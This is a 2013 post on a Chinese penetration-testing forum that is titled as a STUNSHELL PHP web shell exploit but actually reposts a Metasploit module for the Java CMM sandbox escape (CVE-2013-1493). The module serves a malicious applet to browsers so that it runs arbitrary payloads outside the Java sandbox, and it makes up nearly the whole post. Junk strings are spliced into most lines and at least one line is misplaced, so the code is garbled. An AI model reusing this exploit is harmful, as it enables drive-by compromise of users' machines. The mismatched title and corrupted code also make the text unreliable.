中国网络渗透测试联盟

标题: STUNSHELL PHP Web Shell远程执行代码 [打印本页]

---

作者: admin    时间: 2013-4-4 17:31
标题: STUNSHELL PHP Web Shell远程执行代码
##

3 }8 l& H* d1 V2 N# A& X! _  }% I3 ?$ [# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
2 h$ ^5 v# I; \0 `! q# web site for more information on licensing and terms of use.
$ i$ _' Z/ |, S# d. q+ `# http://metasploit.com/
' c+ a' T! P1 c$ {' A+ X##
' L, L; X9 v: R( {# A3 a2 Krequire ‘msf/core’
) _& i3 J) e- ^  a- a5 brequire ‘rex’
/ `5 K6 v. p1 [- o: q& y7 A) d! Jclass Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
5 p0 Z3 b6 }$ x, p' V, i, k/ H2 m9 `2 Pinclude Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
: y0 T. m0 i( j- X/ e1 G* z  Idef initialize( info = {} )
super( update_info( info,
" ~  k( s& x0 S9 ]3 E7 O9 h‘Name’ => ‘Java CMM Remote Code Execution’,
‘Description’ => %q{
* C8 l4 A5 W4 l6 n! J. u* nThis module abuses the Color Management classes from a Java Applet to run
arbitrary Java code outside of the sandbox as exploited in the wild in February
2 ~: Z  E. |. Sand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
% y( X6 j7 m! Q; Kand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
' y3 w3 X6 s2 @& I4 G2 n. ?$ hwarning in order to run the malicious applet.
5 `8 F" r0 d1 K( }) F},
6 H# U* x- b2 Q  t6 W* ^‘License’ => MSF_LICENSE,
; T4 I( a; Y& f‘Author’ =>
, l. S, r9 J+ H9 Y. @; D'Unknown', # Vulnerability discovery and Exploit
'juan vazquez' # Metasploit module (just ported the published exploit)
' o7 o* Z  h1 Y],
/ k# q6 w0 [7 `4 C‘References’ =>
7 U$ X, a2 q  w2 K6 P- Z3 n[
/ b0 f- x; _' b6 a) Q4 v- z) p[ 'CVE', '2013-1493' ],
[ 'OSVDB', '90737' ],
[ 'BID', '58238' ],
5 U8 B& H+ C/ n; ?5 G( i$ j[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
2 A% T& H" D5 d[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
  l; B( Y# l" G8 O# ~3 T" w* ^3 f+ D[ 'URL', 'http://pastie.org/pastes/6581034' ]
( R6 P( P5 U- q9 d# W' O7 w],
# C& L1 O; T4 M4 S‘Platform’ => [ 'win', 'java' ],
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
‘Targets’ =>
[
$ X$ d5 T+ {+ X[ 'Generic (Java Payload)',
{
'Platform' => 'java',
. N0 d. V- |4 k8 m'Arch' => ARCH_JAVA
}
],
[ 'Windows x86 (Native Payload)',
{
) R! w- |  ?/ b" ~9 b7 {1 o'Platform' => 'win',
; N. B& X; g5 I- d) s' ?" z. h'Arch' => ARCH_X86
! U# q( P7 b9 E! n2 {1 U4 t# A3 o}
5 {) O' k- S4 ]$ x. v]
! y! Y7 O' X9 }+ [],
‘‘DisclosureDate’ => ‘Mar 01 2013′
! u2 @3 ]: G# j: @- o))
end
5 e- |' {- j) vdef setup
" K% w& L5 s% I8 }0 G6 u- [5 Xpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
( g8 |. Q! `; w6 {2 S) ?@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
0 S, W0 r6 C5 ]6 |@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
; ?# t- r- s3 Y+ ]@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
@init_class_name = rand_text_alpha(“Init”.length)
3 m1 e' E& i& W" \5 ~- r/ t@init_class.gsub!(“Init”, @init_class_name)
super
/ Z% @! R1 M7 A" }8 t, Uend
def on_request_uri(cli, request)
9 y- }1 l1 Y8 c) O5 ]8 N" [print_status(“handling request for #{request.uri}”)
$ r# z# l: h5 v! Kcase request.uri
8 y! f! O8 _- n& dwhen /\.jar$/i
jar = payload.encoded_jar
4 G8 w; g4 Y- ?jar.add_file(“#{@init_class_name}.class”, @init_class)
, P9 ]- P- l4 w% Y& Ojar.add_file(“Leak.class”, @leak_class)
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
jar.add_file(“MyColorSpace.class”, @color_space_class)
3 l% K3 ]- [3 oDefaultTarget’ => 1,
; {; \4 B  Z/ [* Jmetasploit_str = rand_text_alpha(“metasploit”.length)
3 p; N$ I) o1 `& M- ]8 j' `# bpayload_str = rand_text_alpha(“payload”.length)
jar.entries.each { |entry|
  G; X- S: g/ b6 W  z/ i) Qentry.name.gsub!(“metasploit”, metasploit_str)
  T# t) d* t" D/ eentry.name.gsub!(“Payload”, payload_str)
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
, o! |1 v. L1 Q1 ^( [9 E( yentry.data = entry.data.gsub(“Payload”, payload_str)
}
jar.build_manifest
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
4 W% b2 {7 q4 T+ R0 ~$ h5 f$ twhen /\/$/
; Q- T  [1 `  O" T3 }payload = regenerate_payload(cli)
8 O( x! m  P. s& Gif not payload
# j. I8 @: r* n! Y  s8 j' o1 O, n1 Cprint_error(“Failed to generate the payload.”)
send_not_found(cli)
return
end
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
else
1 U/ [$ ]5 s: N$ h! Ysend_redirect(cli, get_resource() + ‘/’, ”)
end
; M" s0 _, z- Q; Uend
1 Q' k2 x8 W; O- ddef generate_html
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
+ o* Z6 L7 X( j4 `" E8 fhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
html += %Q|</applet></body></html>|
8 Z* ^0 k- X8 K9 N, O- a% Dreturn html
end
end
  F+ k% @5 U+ @1 u- m" J2 y/ Xend

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2